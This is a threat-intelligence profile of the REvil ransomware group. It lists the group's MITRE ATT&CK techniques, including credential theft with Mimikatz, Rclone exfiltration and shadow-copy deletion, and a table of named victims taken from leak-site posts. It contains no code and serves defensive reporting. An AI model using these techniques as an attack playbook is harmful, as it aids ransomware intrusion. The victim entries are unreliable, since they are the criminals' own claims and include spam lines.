revil
Group profile
Sodinokibi ransomware group also known as REvil (Ransomware Evil) operates as a ransomware-as-a-service (RaaS) model. After the group compromised his victims, they would threaten to publish the victim's sensitive data on their darknet blog named 'Happy Blog', unless the ransom is paid. The ransomware malware code used by REvil is pretty similar to the ransomware code used by DarkSide - a different threat actor. REvil group claims to steal information after a successful attack on the supplier of the tech giant Apple and stole confidential schematics of their upcoming products.
MITRE ATT&CK TTPs
Initial Access
T1078Valid Accounts
Compromised RDP credentials purchased from underground markets and initial access brokers used to establish footholds.
T1190Exploit Public-Facing Application
REvil exploited Kaseya VSA (CVE-2021-30116), Pulse Secure VPN vulnerabilities, and Oracle WebLogic to gain initial access at scale.
T1195Supply Chain Compromise
The Kaseya VSA supply chain attack (July 2021) leveraged a trusted IT management software vendor to distribute REvil ransomware to thousands of managed service provider customers simultaneously.
Execution
Defense Evasion
T1027Obfuscated Files or Information
REvil payloads are packed with custom packers and configuration encrypted with RC4 to evade static detection.
T1497Virtualization/Sandbox Evasion
REvil includes sandbox detection logic; checks for language/keyboard settings and terminates on CIS country detections.
T1562.001Disable or Modify Tools
Security software disabled via PowerShell; Windows Defender excluded via registry modifications before payload detonation.
Credential Access
T1003.001OS Credential Dumping: LSASS Memory
Mimikatz used to harvest credentials from LSASS memory for lateral movement and privilege escalation.
Discovery
Lateral Movement
T1021.001Remote Services: Remote Desktop Protocol
RDP used for lateral movement within victim networks using harvested credentials.
Exfiltration
T1567.002Exfiltration Over Web Service: Exfiltration to Cloud Storage
Rclone used to exfiltrate sensitive data to cloud storage ahead of encryption for double extortion via the Happy Blog leak site.
Command and Control
T1071.001Application Layer Protocol: Web Protocols
HTTPS used for C2 communication; Tor .onion addresses used for the victim negotiation portal.
Impact
T1486Data Encrypted for Impact
REvil uses Salsa20 for file encryption with Elliptic Curve Diffie-Hellman (ECDH) for key exchange. Partial file encryption used for speed. Appends random extension. Operates as RaaS with ~40% affiliate revenue share.
T1490Inhibit System Recovery
Shadow copies deleted via vssadmin; Windows recovery environment disabled via bcdedit to prevent recovery.
Recent victims
showing 50 of 96| Date | Website / victim | Sector | Country |
|---|---|---|---|
| 2022-11-28 | K kusd.edu | Education | US |
| 2022-11-28 | S Sunknowledge Services Inc | Business Services | |
| 2022-11-07 | M medibank.com.au | Healthcare | AU |
| 2022-09-01 | M Midea Group | Manufacturing | |
| 2022-08-02 | D Doosan Group | Manufacturing | |
| 2022-07-25 | O OptiProERP is a leading global provider of industry-specific ERP solutions for manufacture | Technology | |
| 2022-05-12 | L Ludwig Freytag Group | Manufacturing | |
| 2022-05-03 | U Unicity International | Business Services | |
| 2022-04-22 | S Stratford University | Education | |
| 2022-04-21 | A Asfaltproductienijmegen | Construction | |
| 2022-04-21 | C CYMZ | Not Found | |
| 2022-04-21 | W www.oil-india.com | Energy | |
| 2022-04-20 | V Visotec Group www.visotec.com | Manufacturing | |
| 2021-10-15 | P PTT Exploration and Production - 720GB | Energy | |
| 2021-10-08 | E ECKERD PERU S.A, INKAFARMA, MIFARMA | Healthcare | |
| 2021-10-07 | J Join us on RAMP | Not Found | |
| 2021-10-01 | R Ronmor Holdings | Business Services | |
| 2021-09-30 | F Fimmick CRM Hong Kong (www.fimmick.com) | Technology | |
| 2021-09-30 | F Fimmick CRM Honk Kong (www.fimmick.com) | Technology | |
| 2021-09-16 | S Spiezle Architectural Group Inc. | Construction | |
| 2021-09-11 | O ohiograting.com | Manufacturing | |
| 2021-09-09 | A Apex America | Not Found | |
| 2021-09-09 | A Allen, Dyer, Doppelt, & Gilchrist, P.A. | Financial Services | |
| 2021-09-09 | B Betenbough Homes | Construction | |
| 2021-09-09 | C CEC Vibration Products | Manufacturing | |
| 2021-09-09 | E ENPOL LLC | Manufacturing | |
| 2021-09-09 | I Iaffaldano, Shaw & Young LLP | Business Services | |
| 2021-09-09 |  angstrom automotive groupangstrom-usa.com | Manufacturing | US |
| 2021-09-09 | A Agile Property Holdings | Not Found | |
| 2021-09-09 | M Möbelstadt Sommerlad | Consumer Services | |
| 2021-09-09 | G Gosiger | Business Services | |
| 2021-09-09 | N neroindustry.com | Manufacturing | |
| 2021-09-09 | K kuk.de / KREBS + KIEFER / 500GB | Manufacturing | |
| 2021-09-09 | K KASEYA ATTACK INFO | Technology | |
| 2021-09-09 | D Daylesford - BHoldings - Bamford - The Wild Rabbit | Hospitality and Tourism | |
| 2021-09-09 | H Hx5, LLC | Not Found | |
| 2021-09-09 | I inocean.no / 2000 GB | Not Found | |
| 2021-09-09 | P Primo Water | Consumer Services | |
| 2021-09-09 | L lstaff.com / atworksprofessional / atworks.com | Business Services | |
| 2021-09-09 | S South Carolina Legal Services breach | Public Sector | |
| 2021-09-09 | E ensingerplastics.com | Manufacturing | |
| 2021-07-02 | K Kaseya clients | Technology | |
| 2021-06-28 | U University Medical Center | Healthcare | US |
| 2021-06-01 |  Fujifilmfujifilm.com | Healthcare | JP |
| 2021-05-30 | J JBS (meat processor) | Agriculture and Food Production | |
| 2021-05-01 | S Sol Oriens | Energy | US |
| 2021-04-28 | B Brazil's Tribunal de Justiça do Estado do Rio Grande do Sul | Public Sector | BR |
| 2021-04-20 | A Apple MacBook via supplier Quanta Computer | Technology | |
| 2021-04-01 | A Asteelflash | Manufacturing | FR |
| 2021-03-31 |  Pierre Fabrepierre-fabre.com | Manufacturing | FR |